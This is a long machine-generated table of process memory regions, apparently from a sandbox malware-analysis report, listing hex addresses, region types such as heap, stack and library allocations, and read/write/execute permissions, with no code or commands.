trusted library section
page read and write
2762000
trusted library allocation
page read and write
6096000
trusted library allocation
page read and write
6090000
trusted library allocation
page read and write
55ED000
trusted library allocation
page read and write
6D7E000
heap
page read and write
7F80000
trusted library allocation
page read and write
5542000
trusted library allocation
page read and write
76667F000
stack
page read and write
285C000
stack
page read and write
5602000
trusted library allocation
page read and write
24D0000
trusted library section
page read and write
3250000
heap
page read and write
B07000
heap
page read and write
E00000
trusted library allocation
page read and write
2519000
trusted library allocation
page read and write
3819000
trusted library allocation
page read and write
78E9000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
5F4E000
trusted library allocation
page read and write
6F1E000
stack
page read and write
58C0000
trusted library allocation
page read and write
4F0E000
stack
page read and write
4B20000
heap
page read and write
401000
unkown
page write copy
5C3E000
stack
page read and write
870000
trusted library allocation
page read and write
4DEB000
trusted library allocation
page read and write
4EB7000
trusted library allocation
page read and write
4D25000
trusted library allocation
page read and write
4CA2000
trusted library allocation
page read and write
2560000
heap
page readonly
301B000
heap
page read and write
5416000
trusted library allocation
page read and write
51AE000
trusted library allocation
page read and write
5423000
trusted library allocation
page read and write
506C000
trusted library allocation
page read and write
4D7F000
trusted library allocation
page read and write
22184070000
heap
page read and write
480E000
stack
page read and write
55C4000
trusted library allocation
page read and write
4D00000
trusted library allocation
page read and write
420F000
stack
page read and write
7D30000
trusted library allocation
page read and write
4DFC000
stack
page read and write
4BC0000
heap
page read and write
4FC0000
heap
page read and write
4CC3000
trusted library allocation
page read and write
4E64000
trusted library allocation
page read and write
5F50000
trusted library allocation
page read and write
567F000
trusted library allocation
page read and write
8B3000
trusted library allocation
page execute and read and write
5FA0000
heap
page read and write
700E000
stack
page read and write
7A70000
trusted library allocation
page read and write
5D40000
trusted library allocation
page read and write
4D92000
trusted library allocation
page read and write
3739000
trusted library allocation
page read and write
5476000
trusted library allocation
page read and write
1FEEE1A7000
heap
page read and write
5D73000
trusted library allocation
page read and write
4A2D000
trusted library allocation
page execute and read and write
78C0000
trusted library allocation
page read and write
4D53000
trusted library allocation
page read and write
4D3F000
trusted library allocation
page read and write
4E08000
heap
page read and write
57FD000
trusted library allocation
page read and write
4B56000
trusted library allocation
page read and write
87D000
trusted library allocation
page execute and read and write
54D6000
trusted library allocation
page read and write
53FF000
trusted library allocation
page read and write
4F75000
trusted library allocation
page read and write
5F10000
heap
page read and write
3CA000
stack
page read and write
54DA000
trusted library allocation
page read and write
57F7000
trusted library allocation
page read and write
5446000
trusted library allocation
page read and write
279C000
trusted library allocation
page read and write
58E1000
trusted library allocation
page read and write
5604000
trusted library allocation
page read and write
4C8A000
trusted library allocation
page read and write
1C7979A0000
heap
page read and write
8AF0000
trusted library allocation
page read and write
543A000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
4F4E000
trusted library allocation
page read and write
4E4F000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
58E3000
trusted library allocation
page read and write
71BB000
stack
page read and write
5393000
trusted library allocation
page read and write
A77000
trusted library allocation
page execute and read and write
54AE000
trusted library allocation
page read and write
4CA4000
trusted library allocation
page read and write
24B0000
heap
page read and write
2776000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
4D81000
trusted library allocation
page read and write
5DE0000
trusted library allocation
page read and write
5875000
trusted library allocation
page read and write
55D2000
trusted library allocation
page read and write
4903000
trusted library allocation
page read and write
4E38000
trusted library allocation
page read and write
9F2000
trusted library allocation
page read and write
25BE000
stack
page read and write
4D93000
heap
page read and write
7010000
trusted library allocation
page read and write
230000
heap
page read and write
8860000
heap
page read and write
4F5C000
trusted library allocation
page read and write
6DD4000
heap
page read and write
454000
unkown
page readonly
22183EE0000
heap
page read and write
4F5E000
trusted library allocation
page read and write
8680000
trusted library allocation
page read and write
558B000
trusted library allocation
page read and write
FD2FDF8000
stack
page read and write
4880000
trusted library allocation
page read and write
402000
unkown
page readonly
4A39000
trusted library allocation
page read and write
2EA8000
stack
page read and write
28B0000
trusted library allocation
page execute and read and write
8D0000
heap
page read and write
2522000
trusted library allocation
page read and write
5852000
trusted library allocation
page read and write
5AFB000
stack
page read and write
8B50000
trusted library allocation
page execute and read and write
4E32000
trusted library allocation
page read and write
2F67000
heap
page read and write
9FB000
trusted library allocation
page execute and read and write
DE6000
trusted library allocation
page read and write
1C7977D1000
heap
page read and write
53B0000
trusted library allocation
page read and write
53D6000
trusted library allocation
page read and write
868A000
trusted library allocation
page read and write
54FB000
trusted library allocation
page read and write
534E000
stack
page read and write
4C59000
trusted library allocation
page read and write
80B0000
trusted library allocation
page read and write
78A0000
trusted library allocation
page execute and read and write
53B2000
trusted library allocation
page read and write
584A000
trusted library allocation
page read and write
1FEEE130000
heap
page read and write
5681000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
54F3000
trusted library allocation
page read and write
6760000
heap
page read and write
79FE000
stack
page read and write
5525000
trusted library allocation
page read and write
1E13D6E0000
heap
page read and write
5F9F000
stack
page read and write
4E2E000
trusted library allocation
page read and write
277D000
trusted library allocation
page read and write
5592000
trusted library allocation
page read and write
51B8000
trusted library allocation
page read and write
98A000
heap
page read and write
552E000
trusted library allocation
page read and write
4EC6000
trusted library allocation
page read and write
257A000
heap
page read and write
53B8000
trusted library allocation
page read and write
54CC000
trusted library allocation
page read and write
700000
heap
page read and write
5125000
trusted library allocation
page read and write
51BA000
trusted library allocation
page read and write
8C20000
trusted library allocation
page execute and read and write
9E0000
trusted library allocation
page read and write
558E000
trusted library allocation
page read and write
4DA7000
trusted library allocation
page read and write
53DE000
trusted library allocation
page read and write
22184090000
heap
page read and write
7770000
heap
page read and write
5679000
trusted library allocation
page read and write
55D6000
trusted library allocation
page read and write
7A80000
trusted library allocation
page execute and read and write
7080000
trusted library allocation
page read and write
5940000
heap
page read and write
4D55000
trusted library allocation
page read and write
4DE5000
heap
page read and write
7090000
trusted library allocation
page read and write
4DA0000
heap
page read and write
2500000
trusted library allocation
page read and write
4DE7000
heap
page read and write
695E000
stack
page read and write
5920000
heap
page read and write
4B6A000
trusted library allocation
page read and write
5865000
trusted library allocation
page read and write
636E000
stack
page read and write
555B000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
4CF0000
heap
page execute and read and write
8C70000
heap
page read and write
56BE000
trusted library allocation
page read and write
5448000
trusted library allocation
page read and write
4CA0000
trusted library allocation
page read and write
4CD6000
trusted library allocation
page read and write
5632000
trusted library allocation
page read and write
4F92000
trusted library allocation
page read and write
502B000
trusted library allocation
page read and write
4ABE000
stack
page read and write
92D2000
trusted library allocation
page read and write
511A000
trusted library allocation
page read and write
780000
heap
page read and write
4F58000
trusted library allocation
page read and write
8240000
trusted library allocation
page execute and read and write
70CE000
stack
page read and write
DE0000
trusted library allocation
page read and write
5675000
trusted library allocation
page read and write
472D000
stack
page read and write
8150000
trusted library allocation
page read and write
1B79F898000
heap
page read and write
7A40000
trusted library allocation
page read and write
4E34000
trusted library allocation
page read and write
8BD000
trusted library allocation
page execute and read and write
A62000
trusted library allocation
page read and write
4E06000
trusted library allocation
page read and write
5FB0000
trusted library allocation
page read and write
8520000
trusted library allocation
page read and write
53FB000
trusted library allocation
page read and write
92B0000
trusted library allocation
page execute and read and write
5F5D000
stack
page read and write
8140000
trusted library allocation
page read and write
6FDD000
stack
page read and write
3220000
heap
page read and write
55EF000
trusted library allocation
page read and write
A72000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
564B000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
309D000
heap
page read and write
5512000
trusted library allocation
page read and write
73CA000
stack
page read and write
C60000
trusted library allocation
page read and write
51A8000
trusted library allocation
page read and write
4C5B000
trusted library allocation
page read and write
2526000
trusted library allocation
page execute and read and write
519B000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
501E000
stack
page read and write
4E51000
trusted library allocation
page read and write
53C9000
trusted library allocation
page read and write
AEA000
heap
page read and write
4EB3000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
5A4D000
trusted library allocation
page read and write
1B79F89A000
heap
page read and write
51A0000
trusted library allocation
page read and write
58C8000
trusted library allocation
page read and write
612E000
stack
page read and write
5559000
trusted library allocation
page read and write
4D90000
heap
page read and write
575A000
trusted library allocation
page read and write
54C8000
trusted library allocation
page read and write
4C6A000
trusted library allocation
page read and write
2504000
trusted library allocation
page read and write
2861000
trusted library allocation
page read and write
51B4000
trusted library allocation
page read and write
4DF2000
trusted library allocation
page read and write
58C6000
trusted library allocation
page read and write
4DF8000
trusted library allocation
page read and write
7CFF000
stack
page read and write
FD300FF000
stack
page read and write
4887000
trusted library allocation
page read and write
5191000
trusted library allocation
page read and write
18C000
stack
page read and write
511C000
trusted library allocation
page read and write
4F02000
trusted library allocation
page read and write
B10000
heap
page read and write
7663EE000
stack
page read and write
54F1000
trusted library allocation
page read and write
56C4000
trusted library allocation
page read and write
66F5000
trusted library allocation
page read and write
5A47000
trusted library allocation
page read and write
4CBF000
trusted library allocation
page read and write
68DE000
stack
page read and write
7E0000
heap
page read and write
50FD000
trusted library allocation
page read and write
380000
remote allocation
page execute and read and write
7AD3000
trusted library allocation
page read and write
78B2000
trusted library allocation
page read and write
5645000
trusted library allocation
page read and write
4CF5000
trusted library allocation
page read and write
4C57000
trusted library allocation
page read and write
615D000
stack
page read and write
5D50000
trusted library allocation
page read and write
941F000
heap
page read and write
8130000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
4D3C000
trusted library allocation
page read and write
2520000
trusted library allocation
page read and write
5662000
trusted library allocation
page read and write
26FC000
stack
page read and write
4C4F000
trusted library allocation
page read and write
4EE1000
trusted library allocation
page read and write
424E000
stack
page read and write
4C53000
trusted library allocation
page read and write
4A70000
trusted library allocation
page read and write
649E000
stack
page read and write
1C7977C2000
heap
page read and write
588C000
trusted library allocation
page read and write
4FC9000
trusted library allocation
page read and write
4D98000
trusted library allocation
page read and write
489B000
heap
page read and write
4EE5000
trusted library allocation
page read and write
2855000
trusted library allocation
page read and write
47EE000
stack
page read and write
4A50000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
55AA000
trusted library allocation
page read and write
4B6E000
trusted library allocation
page read and write
556A000
trusted library allocation
page read and write
4B90000
heap
page execute and read and write
251000
unkown
page read and write
617E000
trusted library allocation
page read and write
4E9E000
trusted library allocation
page read and write
581A000
trusted library allocation
page read and write
8876000
heap
page read and write
727E000
stack
page read and write
84E0000
heap
page read and write
4DE2000
heap
page read and write
58CD000
trusted library allocation
page read and write
631E000
stack
page read and write
8B4000
trusted library allocation
page read and write
4DFC000
trusted library allocation
page read and write
860000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
7B0E000
stack
page read and write
7060000
trusted library allocation
page read and write
4EEE000
trusted library allocation
page read and write
51DF000
stack
page read and write
5890000
trusted library allocation
page read and write
7BFE000
stack
page read and write
969000
heap
page read and write
27A6000
trusted library allocation
page read and write
4D1D000
trusted library allocation
page read and write
6D4B000
heap
page read and write
8940000
trusted library section
page read and write
7A66000
stack
page read and write
A9C000
stack
page read and write
4B00000
heap
page readonly
4CA8000
trusted library allocation
page read and write
5546000
trusted library allocation
page read and write
5898000
trusted library allocation
page read and write
64ED000
stack
page read and write
4F86000
trusted library allocation
page read and write
5598000
trusted library allocation
page read and write
5803000
trusted library allocation
page read and write
4DE3000
trusted library allocation
page read and write
E10000
heap
page read and write
8C30000
trusted library allocation
page execute and read and write
562E000
trusted library allocation
page read and write
5848000
trusted library allocation
page read and write
5472000
trusted library allocation
page read and write
7F1E0000
trusted library allocation
page execute and read and write
7B00000
trusted library allocation
page read and write
1C7978B0000
heap
page read and write
80D0000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
5867000
trusted library allocation
page read and write
55D0000
trusted library allocation
page read and write
4D96000
trusted library allocation
page read and write
5425000
trusted library allocation
page read and write
486A000
stack
page read and write
5871000
trusted library allocation
page read and write
54B9000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
6F5F000
stack
page read and write
5677000
trusted library allocation
page read and write
511E000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
FD2FEFD000
stack
page read and write
2550000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
88D000
trusted library allocation
page execute and read and write
5587000
trusted library allocation
page read and write
4E36000
trusted library allocation
page read and write
2503000
trusted library allocation
page execute and read and write
5F43000
trusted library allocation
page read and write
5635000
trusted library allocation
page read and write
4ECE000
trusted library allocation
page read and write
5FEE000
trusted library allocation
page read and write
6826D7E000
stack
page read and write
5D3E000
stack
page read and write
6BCE000
stack
page read and write
4E02000
trusted library allocation
page read and write
276A000
trusted library allocation
page read and write
275E000
trusted library allocation
page read and write
6826CFF000
stack
page read and write
592C000
heap
page read and write
93A0000
trusted library allocation
page execute and read and write
4F94000
trusted library allocation
page read and write
1C7978D0000
heap
page read and write
4F1E000
stack
page read and write
AAA000
heap
page read and write
4DA2000
trusted library allocation
page read and write
7A3D000
stack
page read and write
56AB000
trusted library allocation
page read and write
2771000
trusted library allocation
page read and write
26BE000
stack
page read and write
582D000
trusted library allocation
page read and write
4EDD000
trusted library allocation
page read and write
4E0E000
trusted library allocation
page read and write
22184099000
heap
page read and write
567D000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
89B0000
trusted library allocation
page execute and read and write
562C000
trusted library allocation
page read and write
53E4000
trusted library allocation
page read and write
4DE5000
trusted library allocation
page read and write
1FEEE1AA000
heap
page read and write
4FBA000
trusted library allocation
page read and write
4D9A000
trusted library allocation
page read and write
56AD000
trusted library allocation
page read and write
4358000
heap
page read and write
7AA0000
trusted library allocation
page read and write
553E000
trusted library allocation
page read and write
569E000
trusted library allocation
page read and write
C77000
heap
page read and write
4ECC000
trusted library allocation
page read and write
5548000
trusted library allocation
page read and write
519D000
trusted library allocation
page read and write
5BFE000
stack
page read and write
54E0000
trusted library allocation
page read and write
FD2FFFE000
stack
page read and write
55A0000
trusted library allocation
page read and write
58CA000
trusted library allocation
page read and write
6826C7C000
stack
page read and write
4E90000
trusted library allocation
page read and write
4E1D000
trusted library allocation
page read and write
54F9000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
4DC0000
trusted library allocation
page read and write
6B8E000
stack
page read and write
4D64000
trusted library allocation
page read and write
5D57000
trusted library allocation
page read and write
4D72000
trusted library allocation
page read and write
2EAD000
stack
page read and write
7BB5000
trusted library allocation
page read and write
70DC000
stack
page read and write
5459000
trusted library allocation
page read and write
53A4000
trusted library allocation
page read and write
6C0E000
stack
page read and write
8120000
trusted library allocation
page read and write
38E000
stack
page read and write
4C4B000
trusted library allocation
page read and write
47AE000
stack
page read and write
22184045000
heap
page read and write
80E0000
heap
page execute and read and write
4FBE000
stack
page read and write
4E96000
trusted library allocation
page read and write
645F000
stack
page read and write
96B000
heap
page read and write
77C1000
heap
page read and write
5683000
trusted library allocation
page read and write
4DEF000
trusted library allocation
page read and write
5399000
trusted library allocation
page read and write
55CE000
trusted library allocation
page read and write
5403000
trusted library allocation
page read and write
4FAB000
trusted library allocation
page read and write
58DF000
trusted library allocation
page read and write
27F1000
trusted library allocation
page read and write
515D000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
4F3D000
trusted library allocation
page read and write
6E40000
trusted library allocation
page execute and read and write
3CC06FF000
stack
page read and write
6180000
trusted library allocation
page read and write
4C6C000
stack
page read and write
69B8000
heap
page read and write
FD2FBFF000
stack
page read and write
4F56000
trusted library allocation
page read and write
4F78000
trusted library allocation
page read and write
392319000
stack
page read and write
8625000
trusted library allocation
page read and write
890000
heap
page read and write
7E0000
heap
page read and write
30D3000
heap
page read and write
5195000
trusted library allocation
page read and write
57FF000
trusted library allocation
page read and write
59B0000
heap
page read and write
5514000
trusted library allocation
page read and write
80C0000
trusted library allocation
page read and write
3859000
trusted library allocation
page read and write
4F8A000
trusted library allocation
page read and write
7FA0000
trusted library section
page read and write
2F5E000
stack
page read and write
5630000
trusted library allocation
page read and write
1E13D854000
heap
page read and write
30F6000
heap
page read and write
4BB3000
heap
page read and write
78E0000
trusted library allocation
page read and write
B23000
heap
page read and write
4D30000
trusted library allocation
page read and write
276A000
trusted library allocation
page read and write
4F43000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
5457000
trusted library allocation
page read and write
8AD0000
heap
page execute and read and write
402000
unkown
page readonly
4D6A000
trusted library allocation
page read and write
4E24000
trusted library allocation
page read and write
5133000
trusted library allocation
page read and write
4E1B000
trusted library allocation
page read and write
221840F2000
heap
page read and write
57FB000
trusted library allocation
page read and write
2620000
heap
page read and write
4FA3000
trusted library allocation
page read and write
7450000
heap
page read and write
548D000
trusted library allocation
page read and write
58E7000
trusted library allocation
page read and write
4CC8000
trusted library allocation
page read and write
29DE000
heap
page read and write
760E000
stack
page read and write
758E000
stack
page read and write
4D02000
trusted library allocation
page read and write
8C00000
trusted library allocation
page execute and read and write
476B000
stack
page read and write
296F000
heap
page read and write
59BF000
heap
page read and write
4DB8000
heap
page read and write
3010000
heap
page read and write
966000
heap
page read and write
27A0000
trusted library allocation
page read and write
397000
heap
page read and write
A60000
trusted library allocation
page read and write
52DE000
stack
page read and write
5168000
trusted library allocation
page read and write
53B6000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
4CAE000
stack
page read and write
1E13D868000
heap
page read and write
609B000
trusted library allocation
page read and write
93D0000
heap
page read and write
6E89000
trusted library allocation
page read and write
56BC000
trusted library allocation
page read and write
6E1D000
trusted library allocation
page read and write
4CF1000
trusted library allocation
page read and write
6E50000
trusted library allocation
page read and write
2535000
trusted library allocation
page execute and read and write
5643000
trusted library allocation
page read and write
390000
heap
page read and write
5397000
trusted library allocation
page read and write
5613000
trusted library allocation
page read and write
5EB0000
trusted library allocation
page execute and read and write
59FE000
stack
page read and write
5611000
trusted library allocation
page read and write
4CBB000
trusted library allocation
page read and write
4F62000
trusted library allocation
page read and write
1E13D87F000
heap
page read and write
5896000
trusted library allocation
page read and write
7F6B0000
trusted library allocation
page execute and read and write
8CF000
heap
page read and write
27E0000
heap
page execute and read and write
6D3B000
heap
page read and write
662F000
stack
page read and write
29FE000
heap
page read and write
3BE000
remote allocation
page execute and read and write
8650000
trusted library allocation
page read and write
51B2000
trusted library allocation
page read and write
55A2000
trusted library allocation
page read and write
240000
unkown
page readonly
5886000
trusted library allocation
page read and write
93B0000
heap
page read and write
ADE000
stack
page read and write
54F7000
trusted library allocation
page read and write
8B12000
trusted library allocation
page read and write
5F27000
trusted library allocation
page read and write
8B0000
trusted library allocation
page read and write
6178000
trusted library allocation
page read and write
1B79F800000
heap
page read and write
7D7000
heap
page read and write
8B5000
heap
page read and write
4F4A000
trusted library allocation
page read and write
4B10000
trusted library allocation
page execute and read and write
7A50000
trusted library allocation
page read and write
5436000
trusted library allocation
page read and write
5F00000
trusted library allocation
page read and write
5FF9000
trusted library allocation
page read and write
FD2F9FE000
stack
page read and write
22183FC0000
heap
page read and write
5193000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
2532000
trusted library allocation
page read and write
584E000
trusted library allocation
page read and write
4D8E000
trusted library allocation
page read and write
5530000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
4B50000
trusted library allocation
page read and write
51BC000
trusted library allocation
page read and write
55BD000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
89A000
heap
page read and write
56BA000
trusted library allocation
page read and write
252A000
trusted library allocation
page execute and read and write
4D9E000
trusted library allocation
page read and write
66C0000
trusted library allocation
page execute and read and write
1B79F720000
heap
page read and write
55A6000
trusted library allocation
page read and write
53CF000
trusted library allocation
page read and write
4D6E000
trusted library allocation
page read and write
4D8A000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
77E0000
heap
page read and write
5376000
trusted library allocation
page read and write
There are 1219 hidden memdumps, click here to show them.